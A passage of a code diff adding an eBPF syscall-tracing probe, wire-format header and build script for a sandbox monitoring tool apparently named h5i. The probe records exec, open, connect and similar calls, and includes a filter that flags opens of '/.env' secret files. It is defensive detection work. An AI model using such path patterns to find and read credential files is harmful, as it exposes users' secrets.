+    __uint(type, BPF_MAP_TYPE_ARRAY);
+    __uint(max_entries, 1);
+    __type(key, __u32);
+    __type(value, struct h5i_config);
+} H5I_CONFIG SEC(".maps");
+
+struct {
+    __uint(type, BPF_MAP_TYPE_ARRAY);
+    __uint(max_entries, H5I_MAX_PREFIX);
+    __type(key, __u32);
+    __type(value, struct h5i_prefix);
+} H5I_PREFIXES SEC(".maps");
+
+struct {
+    __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
+    __uint(max_entries, H5I_STAT_MAX);
+    __type(key, __u32);
+    __type(value, __u64);
+} H5I_STATS SEC(".maps");
+
+/* --------------------------------------------------------------- helpers */
+
+static __always_inline void h5i_bump(__u32 slot)
+{
+    __u64 *v = bpf_map_lookup_elem(&H5I_STATS, &slot);
+    if (v)
+        __sync_fetch_and_add(v, 1);
+}
+
+static __always_inline struct h5i_config *h5i_cfg(void)
+{
+    __u32 zero = 0;
+    return bpf_map_lookup_elem(&H5I_CONFIG, &zero);
+}
+
+/* Resolve this task's place in the box's process tree, promoting a PENDING
+ * task on the way. See the state machine in h5i_event.h. */
+static __always_inline __u8 h5i_state(void)
+{
+    __u64 pt = bpf_get_current_pid_tgid();
+    __u32 tid = (__u32)pt;
+    __u32 tgid = (__u32)(pt >> 32);
+
+    __u8 *st = bpf_map_lookup_elem(&H5I_TRACKED, &tid);
+    if (!st)
+        return H5I_ST_NONE;
+    __u8 v = *st;
+    if (v != H5I_ST_PEND)
+        return v;
+
+    __u8 next = (tid == tgid) ? H5I_ST_PRE : H5I_ST_SELF;
+    bpf_map_update_elem(&H5I_TRACKED, &tid, &next, BPF_ANY);
+    return next;
+}
+
+static __always_inline int h5i_kind_on(__u16 kind)
+{
+    struct h5i_config *cfg = h5i_cfg();
+    if (!cfg)
+        return 0;
+    return (cfg->kind_mask >> kind) & 1;
+}
+
+/* The gate every program runs first: is this task in scope, is this kind
+ * enabled, and is the task far enough along to be attributed to the box?
+ *
+ * Returns the resolved state, or H5I_ST_NONE when nothing should be emitted.
+ */
+static __always_inline __u8 h5i_admit(__u16 kind)
+{
+    __u8 st = h5i_state();
+    if (st != H5I_ST_LIVE && st != H5I_ST_PRE)
+        return H5I_ST_NONE;
+    /* Before its exec, a task is still running h5i's own bootstrap. Only the
+     * exec itself and the tree bookkeeping are the box's. */
+    if (st == H5I_ST_PRE && kind != H5I_KIND_EXEC && kind != H5I_KIND_FORK &&
+        kind != H5I_KIND_EXIT)
+        return H5I_ST_NONE;
+    if (!h5i_kind_on(kind))
+        return H5I_ST_NONE;
+    return st;
+}
+
+/* Reserve and pre-fill an event. Zeroed in full: the ring buffer hands back
+ * whatever was in the page, and the string fields are copied to userspace
+ * wholesale, so anything short of a full clear is a kernel memory disclosure
+ * across the very boundary this code exists to watch. */
+static __always_inline struct h5i_event *h5i_begin(__u16 kind)
+{
+    struct h5i_event *e = bpf_ringbuf_reserve(&H5I_EVENTS, sizeof(*e), 0);
+    if (!e) {
+        h5i_bump(H5I_STAT_LOST);
+        return 0;
+    }
+    __builtin_memset(e, 0, sizeof(*e));
+    e->magic = H5I_EVENT_MAGIC;
+    e->version = H5I_EVENT_VERSION;
+    e->kind = kind;
+    e->ts_ns = bpf_ktime_get_ns();
+
+    __u64 pt = bpf_get_current_pid_tgid();
+    e->tid = (__u32)pt;
+    e->tgid = (__u32)(pt >> 32);
+    e->uid = (__u32)bpf_get_current_uid_gid();
+    bpf_get_current_comm(&e->comm, sizeof(e->comm));
+    return e;
+}
+
+static __always_inline void h5i_emit(struct h5i_event *e)
+{
+    h5i_bump(H5I_STAT_EMITTED);
+    bpf_ringbuf_submit(e, 0);
+}
+
+static __always_inline void h5i_drop(struct h5i_event *e)
+{
+    h5i_bump(H5I_STAT_FILTERED);
+    bpf_ringbuf_discard(e, 0);
+}
+
+/* Fully unrolled, constant-index prefix match.
+ *
+ * Neither loop has an early exit, and that is the point rather than an
+ * oversight: clang refuses to unroll a loop with more than one exit, and an
+ * un-unrolled version leaves the verifier reasoning about a variable index
+ * into a ring-buffer field. Written this way both bounds are compile-time
+ * constants, every index into `path` and into the prefix record is a literal
+ * after unrolling, and the whole filter is straight-line code with nothing
+ * for the verifier to disagree about. The cost is that a match still walks
+ * the remaining prefixes; at twelve of them that is not a cost worth an
+ * argument.
+ */
+static __always_inline int h5i_prefix_hit(const char *path)
+{
+    struct h5i_config *cfg = h5i_cfg();
+    if (!cfg)
+        return 0;
+    __u32 n = cfg->prefix_count;
+    if (n > H5I_MAX_PREFIX)
+        n = H5I_MAX_PREFIX;
+
+    int hit = 0;
+#pragma unroll
+    for (__u32 i = 0; i < H5I_MAX_PREFIX; i++) {
+        if (i < n) {
+            __u32 idx = i;
+            struct h5i_prefix *pf = bpf_map_lookup_elem(&H5I_PREFIXES, &idx);
+            if (pf) {
+                __u32 len = pf->len;
+                if (len > 0 && len <= H5I_PREFIX_LEN) {
+                    /* Eight-byte head test first. The full comparison is
+                     * still compiled — it has to be, the unroll is the whole
+                     * point — but at run time almost every path fails here
+                     * and branches over it, which is the difference between
+                     * a few hundred instructions per `openat` and a few
+                     * thousand. */
+                    int head = 1;
+                    if (len >= 8) {
+#pragma unroll
+                        for (__u32 h = 0; h < 8; h++) {
+                            if (path[h] != pf->s[h])
+                                head = 0;
+                        }
+                    }
+                    if (head) {
+                        int ok = 1;
+#pragma unroll
+                        for (__u32 j = 0; j < H5I_PREFIX_LEN; j++) {
+                            if (j < len && path[j] != pf->s[j])
+                                ok = 0;
+                        }
+                        if (ok)
+                            hit = 1;
+                    }
+                }
+            }
+        }
+    }
+    return hit;
+}
+
+/* Does the path contain `/.env`?
+ *
+ * The one filter that needs substring semantics, so it is a scan rather than
+ * a map lookup (see `want_dotenv` in h5i_event.h). Unrolled and exit-free
+ * like everything else here; the `done` flag stops the comparisons at the
+ * terminating NUL, so the run-time cost is the length of the path rather than
+ * the size of the buffer.
+ */
+static __always_inline int h5i_dotenv_hit(const char *path)
+{
+    int done = 0;
+    int hit = 0;
+#pragma unroll
+    for (__u32 i = 0; i + 5 <= H5I_PATH_LEN; i++) {
+        if (!done) {
+            if (path[i] == 0)
+                done = 1;
+            else if (path[i] == '/' && path[i + 1] == '.' && path[i + 2] == 'e' &&
+                     path[i + 3] == 'n' && path[i + 4] == 'v')
+                hit = 1;
+        }
+    }
+    return hit;
+}
+
+/* Write intent, as the open flags spell it. The five bits are identical on
+ * every architecture h5i builds for. */
+#define H5I_O_WRONLY 00000001
+#define H5I_O_RDWR 00000002
+#define H5I_O_CREAT 00000100
+#define H5I_O_TRUNC 00001000
+#define H5I_O_APPEND 00002000
+#define H5I_O_WRITEISH \
+    (H5I_O_WRONLY | H5I_O_RDWR | H5I_O_CREAT | H5I_O_TRUNC | H5I_O_APPEND)
+
+#define H5I_AF_UNIX 1
+#define H5I_AF_INET 2
+#define H5I_AF_INET6 10
+
+/* ---------------------------------------------------------------- events */
+
+/* Promote this task past its bootstrap. Called on every exec, whether or not
+ * the event itself was emitted: the state machine is not the kind mask's
+ * business, and a run with `Exec` disabled must still attribute what follows
+ * to the box. */
+static __always_inline void h5i_mark_execed(void)
+{
+    __u64 pt = bpf_get_current_pid_tgid();
+    __u32 tid = (__u32)pt;
+    __u8 *st = bpf_map_lookup_elem(&H5I_TRACKED, &tid);
+    if (st && (*st == H5I_ST_PRE || *st == H5I_ST_LIVE)) {
+        __u8 live = H5I_ST_LIVE;
+        bpf_map_update_elem(&H5I_TRACKED, &tid, &live, BPF_ANY);
+    }
+}
+
+static __always_inline int h5i_do_exec(const char *filename,
+                                       const char *const *argv)
+{
+    if (h5i_admit(H5I_KIND_EXEC) == H5I_ST_NONE) {
+        h5i_mark_execed();
+        return 0;
+    }
+
+    struct h5i_event *e = h5i_begin(H5I_KIND_EXEC);
+    if (!e) {
+        h5i_mark_execed();
+        return 0;
+    }
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, filename);
+
+    if (argv) {
+        const char *p = 0;
+        /* argv[1] and argv[2], at fixed offsets in `aux`. Those two carry
+         * nearly all the signal a single exec has: `-c` plus its script for a
+         * shell, the subcommand for a package manager, the target for an
+         * interpreter. */
+        bpf_probe_read_user(&p, sizeof(p), &argv[1]);
+        if (p)
+            bpf_probe_read_user_str(e->aux, H5I_AUX_HALF, p);
+        p = 0;
+        bpf_probe_read_user(&p, sizeof(p), &argv[2]);
+        if (p)
+            bpf_probe_read_user_str(e->aux + H5I_AUX_HALF, H5I_AUX_HALF, p);
+
+        /* argc, counted without an early exit for the same reason the prefix
+         * loop has none: `break` costs the unroll, and the unroll is what
+         * keeps `&argv[i]` a constant offset. */
+        __s64 argc = 0;
+        int ended = 0;
+#pragma unroll
+        for (int i = 0; i < 32; i++) {
+            const char *q = 0;
+            if (!ended) {
+                if (bpf_probe_read_user(&q, sizeof(q), &argv[i]) != 0 || !q)
+                    ended = 1;
+                else
+                    argc++;
+            }
+        }
+        e->a0 = argc;
+    }
+    h5i_emit(e);
+    /* Past its exec, whatever this task does next is the box's. */
+    h5i_mark_execed();
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_execve")
+int h5i_sys_enter_execve(struct h5i_sys_enter *ctx)
+{
+    return h5i_do_exec((const char *)ctx->args[0],
+                       (const char *const *)ctx->args[1]);
+}
+
+SEC("tracepoint/syscalls/sys_enter_execveat")
+int h5i_sys_enter_execveat(struct h5i_sys_enter *ctx)
+{
+    return h5i_do_exec((const char *)ctx->args[1],
+                       (const char *const *)ctx->args[2]);
+}
+
+static __always_inline int h5i_do_open(const char *filename, __u64 flags,
+                                       __s64 dirfd)
+{
+    if (h5i_admit(H5I_KIND_OPEN) == H5I_ST_NONE)
+        return 0;
+    struct h5i_config *cfg = h5i_cfg();
+    if (!cfg)
+        return 0;
+
+    struct h5i_event *e = h5i_begin(H5I_KIND_OPEN);
+    if (!e)
+        return 0;
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, filename);
+    e->a0 = (__s64)flags;
+    e->a1 = (flags & H5I_O_WRITEISH) ? 1 : 0;
+    e->a2 = dirfd;
+
+    /* The volume decision, taken in the kernel. An unfiltered `openat` feed
+     * is the single loudest thing a build produces, and shipping it to
+     * userspace only to throw 99% of it away is how an observability feature
+     * becomes something people switch off (ROADMAP.md D7). */
+    if (!cfg->open_all && !e->a1 && !h5i_prefix_hit(e->path) &&
+        !(cfg->want_dotenv && h5i_dotenv_hit(e->path))) {
+        h5i_drop(e);
+        return 0;
+    }
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_openat")
+int h5i_sys_enter_openat(struct h5i_sys_enter *ctx)
+{
+    return h5i_do_open((const char *)ctx->args[1], ctx->args[2],
+                       (__s64)ctx->args[0]);
+}
+
+SEC("tracepoint/syscalls/sys_enter_openat2")
+int h5i_sys_enter_openat2(struct h5i_sys_enter *ctx)
+{
+    /* `struct open_how` opens with `__u64 flags`, so the first eight bytes
+     * are the flags word. That is UAPI and does not move. */
+    __u64 flags = 0;
+    bpf_probe_read_user(&flags, sizeof(flags), (const void *)ctx->args[2]);
+    return h5i_do_open((const char *)ctx->args[1], flags, (__s64)ctx->args[0]);
+}
+
+SEC("tracepoint/syscalls/sys_enter_connect")
+int h5i_sys_enter_connect(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_CONNECT) == H5I_ST_NONE)
+        return 0;
+
+    const void *sa = (const void *)ctx->args[1];
+    __u16 family = 0;
+    if (bpf_probe_read_user(&family, sizeof(family), sa) != 0)
+        return 0;
+
+    struct h5i_event *e = h5i_begin(H5I_KIND_CONNECT);
+    if (!e)
+        return 0;
+    e->a0 = family;
+    e->a2 = (__s64)ctx->args[2];
+
+    if (family == H5I_AF_INET) {
+        __u16 port_be = 0;
+        __u32 addr = 0;
+        bpf_probe_read_user(&port_be, sizeof(port_be), (const char *)sa + 2);
+        bpf_probe_read_user(&addr, sizeof(addr), (const char *)sa + 4);
+        e->a1 = (__s64)((port_be >> 8) | ((port_be & 0xff) << 8));
+        __builtin_memcpy(e->aux, &addr, 4);
+    } else if (family == H5I_AF_INET6) {
+        __u16 port_be = 0;
+        bpf_probe_read_user(&port_be, sizeof(port_be), (const char *)sa + 2);
+        bpf_probe_read_user(e->aux, 16, (const char *)sa + 8);
+        e->a1 = (__s64)((port_be >> 8) | ((port_be & 0xff) << 8));
+    } else if (family == H5I_AF_UNIX) {
+        /* sun_path is 108 bytes at offset 2. An abstract socket starts with a
+         * NUL, so read it as bytes and let the loader render it — a string
+         * read would stop at the first byte. */
+        bpf_probe_read_user(e->path, 108, (const char *)sa + 2);
+        e->a1 = 0;
+    }
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_socket")
+int h5i_sys_enter_socket(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_SOCKET) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_SOCKET);
+    if (!e)
+        return 0;
+    e->a0 = (__s64)ctx->args[0];
+    e->a1 = (__s64)ctx->args[1];
+    e->a2 = (__s64)ctx->args[2];
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_ptrace")
+int h5i_sys_enter_ptrace(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_PTRACE) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_PTRACE);
+    if (!e)
+        return 0;
+    e->a0 = (__s64)ctx->args[0];
+    e->a1 = (__s64)ctx->args[1];
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_bpf")
+int h5i_sys_enter_bpf(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_BPF) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_BPF);
+    if (!e)
+        return 0;
+    e->a0 = (__s64)ctx->args[0];
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_unshare")
+int h5i_sys_enter_unshare(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_NSOP) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_NSOP);
+    if (!e)
+        return 0;
+    e->a0 = (__s64)ctx->args[0];
+    e->a1 = 0; /* 0 = unshare, 1 = setns */
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_setns")
+int h5i_sys_enter_setns(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_NSOP) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_NSOP);
+    if (!e)
+        return 0;
+    e->a0 = (__s64)ctx->args[1];
+    e->a1 = 1;
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_init_module")
+int h5i_sys_enter_init_module(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_MODULE) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_MODULE);
+    if (!e)
+        return 0;
+    e->a0 = 0; /* 0 = init_module, 1 = finit_module */
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, (const void *)ctx->args[2]);
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_finit_module")
+int h5i_sys_enter_finit_module(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_MODULE) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_MODULE);
+    if (!e)
+        return 0;
+    e->a0 = 1;
+    e->a1 = (__s64)ctx->args[0];
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, (const void *)ctx->args[1]);
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_memfd_create")
+int h5i_sys_enter_memfd_create(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_MEMFD) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_MEMFD);
+    if (!e)
+        return 0;
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, (const void *)ctx->args[0]);
+    e->a0 = (__s64)ctx->args[1];
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_mount")
+int h5i_sys_enter_mount(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_MOUNT) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_MOUNT);
+    if (!e)
+        return 0;
+    e->a0 = 0; /* 0 = mount, 1 = pivot_root */
+    e->a1 = (__s64)ctx->args[3];
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, (const void *)ctx->args[1]);
+    bpf_probe_read_user_str(e->aux, H5I_AUX_HALF, (const void *)ctx->args[0]);
+    h5i_emit(e);
+    return 0;
+}
+
+SEC("tracepoint/syscalls/sys_enter_pivot_root")
+int h5i_sys_enter_pivot_root(struct h5i_sys_enter *ctx)
+{
+    if (h5i_admit(H5I_KIND_MOUNT) == H5I_ST_NONE)
+        return 0;
+    struct h5i_event *e = h5i_begin(H5I_KIND_MOUNT);
+    if (!e)
+        return 0;
+    e->a0 = 1;
+    bpf_probe_read_user_str(e->path, H5I_PATH_LEN, (const void *)ctx->args[0]);
+    bpf_probe_read_user_str(e->aux, H5I_AUX_HALF, (const void *)ctx->args[1]);
+    h5i_emit(e);
+    return 0;
+}
+
+/* ------------------------------------------------------- the process tree */
+
+SEC("tracepoint/sched/sched_process_fork")
+int h5i_sched_process_fork(struct h5i_sched_fork *ctx)
+{
+    /* Resolve the parent first: a PENDING parent that is about to fork must
+     * be classified before its child inherits from it. */
+    __u8 parent = h5i_state();
+    if (parent == H5I_ST_NONE)
+        return 0;
+
+    __u32 child = (__u32)ctx->child_pid;
+    __u8 next;
+    if (parent == H5I_ST_SELF) {
+        /* h5i forked something. Whether it is the payload (a new process) or
+         * one of h5i's own threads is not knowable here; the child's first
+         * event settles it. */
+        next = H5I_ST_PEND;
+    } else {
+        /* Already the box's. A child inherits the parent's exec state, so a
+         * fork-only worker — Python multiprocessing, a shell subshell — is
+         * not silently muted for never having execed. */
+        next = parent;
+    }
+    bpf_map_update_elem(&H5I_TRACKED, &child, &next, BPF_ANY);
+
+    if (parent != H5I_ST_SELF && h5i_kind_on(H5I_KIND_FORK)) {
+        struct h5i_event *e = h5i_begin(H5I_KIND_FORK);
+        if (e) {
+            e->a0 = (__s64)ctx->child_pid;
+            e->a1 = (__s64)ctx->parent_pid;
+            h5i_emit(e);
+        }
+    }
+    return 0;
+}
+
+SEC("tracepoint/sched/sched_process_exit")
+int h5i_sched_process_exit(struct h5i_sched_exit *ctx)
+{
+    __u32 tid = (__u32)ctx->pid;
+    __u8 *st = bpf_map_lookup_elem(&H5I_TRACKED, &tid);
+    if (!st)
+        return 0;
+    __u8 v = *st;
+    if ((v == H5I_ST_PRE || v == H5I_ST_LIVE) && h5i_kind_on(H5I_KIND_EXIT)) {
+        struct h5i_event *e = h5i_begin(H5I_KIND_EXIT);
+        if (e) {
+            e->a0 = (__s64)ctx->pid;
+            h5i_emit(e);
+        }
+    }
+    /* Pruned here rather than left to expire. The pid-reuse window this
+     * leaves open is one scheduler quantum wide and is stated in the limits
+     * (ROADMAP.md D13.5) rather than papered over with a generation counter
+     * that would cost more than the exposure. */
+    bpf_map_delete_elem(&H5I_TRACKED, &tid);
+    return 0;
+}

--- a/crates/h5i-bpf/bpf/h5i_event.h
+++ b/crates/h5i-bpf/bpf/h5i_event.h
@@ -1,0 +1,129 @@
+/* SPDX-License-Identifier: (BSD-2-Clause OR GPL-2.0)
+ *
+ * h5i_event.h — the wire contract between the probe and the loader.
+ *
+ * This file is the single definition of what crosses the ring buffer. The
+ * Rust side (`src/event.rs`) mirrors it field for field and asserts the size
+ * at compile time; every event also carries a magic word and a version, so a
+ * probe object and a loader that disagree are caught at the first record
+ * rather than silently misparsed into plausible-looking nonsense.
+ *
+ * Fixed size, deliberately. A variable-length record would save bandwidth we
+ * do not need and would cost a length field the verifier has to be convinced
+ * about on every path.
+ */
+
+#ifndef H5I_EVENT_H
+#define H5I_EVENT_H
+
+#define H5I_EVENT_MAGIC 0x68356945u /* "h5iE" */
+#define H5I_EVENT_VERSION 1u
+
+#define H5I_COMM_LEN 16
+#define H5I_PATH_LEN 256
+#define H5I_AUX_LEN 192
+/* `aux` carries two independent strings at fixed offsets rather than one
+ * packed pair: a dynamic write offset is exactly the kind of thing that turns
+ * a trivially verifiable program into an argument with the verifier. */
+#define H5I_AUX_HALF 96
+
+/* Event kinds. Numbers are wire values: append, never renumber. */
+#define H5I_KIND_EXEC 1
+#define H5I_KIND_OPEN 2
+#define H5I_KIND_CONNECT 3
+#define H5I_KIND_SOCKET 4
+#define H5I_KIND_PTRACE 5
+#define H5I_KIND_BPF 6
+#define H5I_KIND_NSOP 7
+#define H5I_KIND_MODULE 8
+#define H5I_KIND_MEMFD 9
+#define H5I_KIND_MOUNT 10
+#define H5I_KIND_FORK 11
+#define H5I_KIND_EXIT 12
+
+/* Statistics slots in the per-CPU counter array. */
+#define H5I_STAT_EMITTED 0
+#define H5I_STAT_LOST 1
+#define H5I_STAT_FILTERED 2
+#define H5I_STAT_MAX 3
+
+/* Prefix filter geometry. Both are unrolled loop bounds in the probe, so they
+ * are the reason `openat` filtering costs a fixed, constant-index comparison
+ * rather than a data-dependent loop. */
+#define H5I_MAX_PREFIX 16
+#define H5I_PREFIX_LEN 64
+
+struct h5i_event {
+    __u32 magic;
+    __u16 version;
+    __u16 kind;
+    __u64 ts_ns;
+    __u32 tgid;
+    __u32 tid;
+    /* Always zero on the wire: the probe reads no kernel structure, so it has
+     * no parent pointer (ROADMAP.md D5). The loader fills this in from the
+     * Fork events it has already seen, which is the same answer without the
+     * CO-RE dependency. */
+    __u32 ppid;
+    __u32 uid;
+    /* Kind-specific scalars; see `Event::decode` on the Rust side for the
+     * per-kind meaning, which is documented in exactly one place. */
+    __s64 a0;
+    __s64 a1;
+    __s64 a2;
+    char comm[H5I_COMM_LEN];
+    char path[H5I_PATH_LEN];
+    char aux[H5I_AUX_LEN];
+};
+
+/* Per-run knobs, one element of an ARRAY map, written by the loader after
+ * load and before attach. */
+struct h5i_config {
+    /* Bit i set ⇒ kind i is emitted. Kind numbers are small, so a u64 covers
+     * the catalogue with room to grow. */
+    __u64 kind_mask;
+    /* How many entries of the prefix array are live. */
+    __u32 prefix_count;
+    /* Emit `Open` for read-only opens that hit no prefix. Off by default:
+     * this is the knob that decides whether a `cargo build` ships a hundred
+     * thousand events or a hundred. */
+    __u32 open_all;
+    /* Also emit any open whose path contains `/.env`.
+     *
+     * A separate flag because it is the one filter that needs *substring*
+     * semantics, and the prefix map cannot express those: a `.env` sits at the
+     * end of a path whose beginning is a directory nobody enumerated. It is a
+     * scan rather than a map lookup, so it is switched off with the rule that
+     * wants it rather than paid for unconditionally. */
+    __u32 want_dotenv;
+    /* Padding to keep the struct's size explicit on both sides of the wire. */
+    __u32 _pad;
+};
+
+struct h5i_prefix {
+    __u32 len;
+    char s[H5I_PREFIX_LEN];
+};
+
+/* Per-pid scope state. The values are a state machine, not flags:
+ *
+ *   SELF  h5i's own thread. Never emitted; its forks become PENDING.
+ *   PEND  forked from something in the set, not yet classified. The first
+ *         event the task raises resolves it: a task whose tid equals its tgid
+ *         is a new process (the payload, or something the payload spawned) and
+ *         becomes PRE; anything else is a thread of h5i and becomes SELF.
+ *   PRE   in the box's tree but has not execed yet. This is the window in
+ *         which h5i's own `pre_exec` code runs — applying Landlock, opening
+ *         the ruleset paths — and attributing that to the box would be
+ *         reporting h5i's confinement work as the box's behaviour. Only Exec
+ *         (and the tree bookkeeping) is emitted here.
+ *   LIVE  in the box's tree, past its exec. Everything is emitted.
+ */
+#define H5I_ST_SELF 0
+#define H5I_ST_PEND 1
+#define H5I_ST_PRE 2
+#define H5I_ST_LIVE 3
+/* Not a stored value: what a lookup miss returns. */
+#define H5I_ST_NONE 255
+
+#endif /* H5I_EVENT_H */

--- a/crates/h5i-bpf/build.rs
+++ b/crates/h5i-bpf/build.rs
@@ -1,0 +1,192 @@
+//! Compile the eBPF probe, when this host can.
+//!
+//! The build is deliberately **soft**. A missing or BPF-incapable `clang` does
+//! not fail the build; it leaves the object out, and the loader then reports
+//! `unavailable: built without the eBPF object` at run time rather than
+//! pretending it collected nothing. That keeps `cargo build` working for a
+//! contributor who has no LLVM installed and is only touching the CLI, which
+//! is the ordinary case.
+//!
+//! It is soft in exactly one direction, though. `H5I_BPF_REQUIRE=1` turns
+//! every skip below into a hard failure, and that is what the CI job for this
+//! lane sets — the shape `H5I_DRT_REQUIRE` already established for the Lean
+//! lane. A binary that silently shipped without its detector would be the
+//! worst of both worlds: a `runtime` block that always says `unavailable` and
+//! a reader who takes that for a quiet box.
+//!
+//! The released binaries do **not** carry the probe today, and that is stated
+//! rather than left to be discovered: the release matrix cross-builds musl
+//! targets inside containers that have no LLVM, and `h5i box detect probe`
+//! reports the consequence in one line with the command that fixes it
+//! (`cargo install --path . --features bpf`). Putting a BPF-capable clang into
+//! four cross-build images to ship a feature that also needs `CAP_BPF` on the
+//! user's machine is work that should follow somebody wanting it, not precede
+//! them.
+
+use std::path::{Path, PathBuf};
+use std::process::Command;
+
+/// Set to `1` to turn every "skipped, and here is why" below into a build
+/// failure.
+const REQUIRE_VAR: &str = "H5I_BPF_REQUIRE";
+
+fn main() {
+    println!("cargo::rerun-if-changed=bpf/h5i_detect.bpf.c");
+    println!("cargo::rerun-if-changed=bpf/h5i_bpf.h");
+    println!("cargo::rerun-if-changed=bpf/h5i_event.h");
+    println!("cargo::rerun-if-env-changed={REQUIRE_VAR}");
+    println!("cargo::rerun-if-env-changed=CLANG");
+    // Declared so the `unexpected_cfgs` lint stays quiet under `-D warnings`.
+    println!("cargo::rustc-check-cfg=cfg(h5i_bpf_object)");
+
+    // The object is only ever loaded on Linux, and only by the `load` feature.
+    // Building it anywhere else would cost every macOS contributor a clang
+    // invocation for a file nothing reads.
+    if std::env::var("CARGO_CFG_TARGET_OS").as_deref() != Ok("linux") {
+        return;
+    }
+    if std::env::var_os("CARGO_FEATURE_LOAD").is_none() {
+        return;
+    }
+
+    match build_object() {
+        Ok(path) => {
+            println!("cargo::rustc-env=H5I_BPF_OBJECT={}", path.display());
+            println!("cargo::rustc-cfg=h5i_bpf_object");
+        }
+        Err(why) => skip(&why),
+    }
+}
+
+/// Report a skip, or fail the build when the caller asked for the object.
+fn skip(why: &str) -> ! {
+    if std::env::var(REQUIRE_VAR).as_deref() == Ok("1") {
+        panic!(
+            "{REQUIRE_VAR}=1 but the eBPF probe could not be built: {why}\n\
+             Install an LLVM whose clang can target BPF (Debian/Ubuntu: `apt install clang llvm`), \
+             or unset {REQUIRE_VAR} to build h5i without the runtime-detection lane."
+        );
+    }
+    println!("cargo::warning=h5i-bpf: runtime detection disabled — {why}");
+    // Not an error: the crate compiles, `h5i box detect probe` says why, and
+    // every `runtime` block it writes carries the same reason.
+    std::process::exit(0);
+}
+
+fn build_object() -> Result<PathBuf, String> {
+    let clang = find_clang().ok_or_else(|| {
+        "no clang on PATH (looked for $CLANG, clang, clang-20 … clang-14)".to_string()
+    })?;
+
+    let out_dir = PathBuf::from(std::env::var("OUT_DIR").map_err(|e| e.to_string())?);
+    let obj = out_dir.join("h5i_detect.o");
+    let src = Path::new("bpf/h5i_detect.bpf.c");
+
+    let output = Command::new(&clang)
+        .args([
+            "-target",
+            "bpf",
+            // -O2 is not a preference: the verifier rejects the unoptimized
+            // output of essentially every BPF program, because -O0 spills to
+            // the stack in patterns it cannot follow.
+            "-O2",
+            // -g emits .BTF, which is what carries the `.maps` section's map
+            // definitions. Without it aya finds no maps at all. It also emits
+            // DWARF, which nothing reads and which `strip_dwarf` removes below
+            // when the toolchain has the tool for it.
+            "-g",
+            "-Wall",
+            "-Werror",
+            "-c",
+        ])
+        .arg(src)
+        .arg("-o")
+        .arg(&obj)
+        .output()
+        .map_err(|e| format!("could not run {}: {e}", clang.display()))?;
+
+    if !output.status.success() {
+        return Err(format!(
+            "{} failed: {}",
+            clang.display(),
+            String::from_utf8_lossy(&output.stderr).trim()
+        ));
+    }
+    if !obj.is_file() {
+        return Err(format!("{} produced no object", clang.display()));
+    }
+    strip_dwarf(&clang, &obj);
+    Ok(obj)
+}
+
+/// Drop the DWARF sections, keeping `.BTF`/`.BTF.ext`.
+///
+/// Best effort by design: DWARF is roughly 90% of the object and nothing in
+/// h5i reads it, but an object that still carries it loads identically. So a
+/// missing `llvm-strip` is not worth failing a build over.
+fn strip_dwarf(clang: &Path, obj: &Path) {
+    // Prefer the `llvm-strip` that sits beside the clang we found, so a
+    // versioned toolchain is not mixed with the distribution default.
+    let mut candidates: Vec<PathBuf> = Vec::new();
+    if let Some(dir) = clang.parent() {
+        let stem = clang.file_name().and_then(|s| s.to_str()).unwrap_or("clang");
+        let suffix = stem.strip_prefix("clang").unwrap_or("");
+        candidates.push(dir.join(format!("llvm-strip{suffix}")));
+    }
+    candidates.push(PathBuf::from("llvm-strip"));
+
+    for cand in candidates {
+        if matches!(
+            Command::new(&cand).arg("-g").arg(obj).status(),
+            Ok(status) if status.success()
+        ) {
+            return;
+        }
+    }
+}
+
+/// Find a clang that can actually emit BPF.
+///
+/// Presence is not the question — a clang built without the BPF backend
+/// compiles the file and then fails at codegen — so each candidate is asked to
+/// compile an empty translation unit for the BPF target before it is trusted.
+fn find_clang() -> Option<PathBuf> {
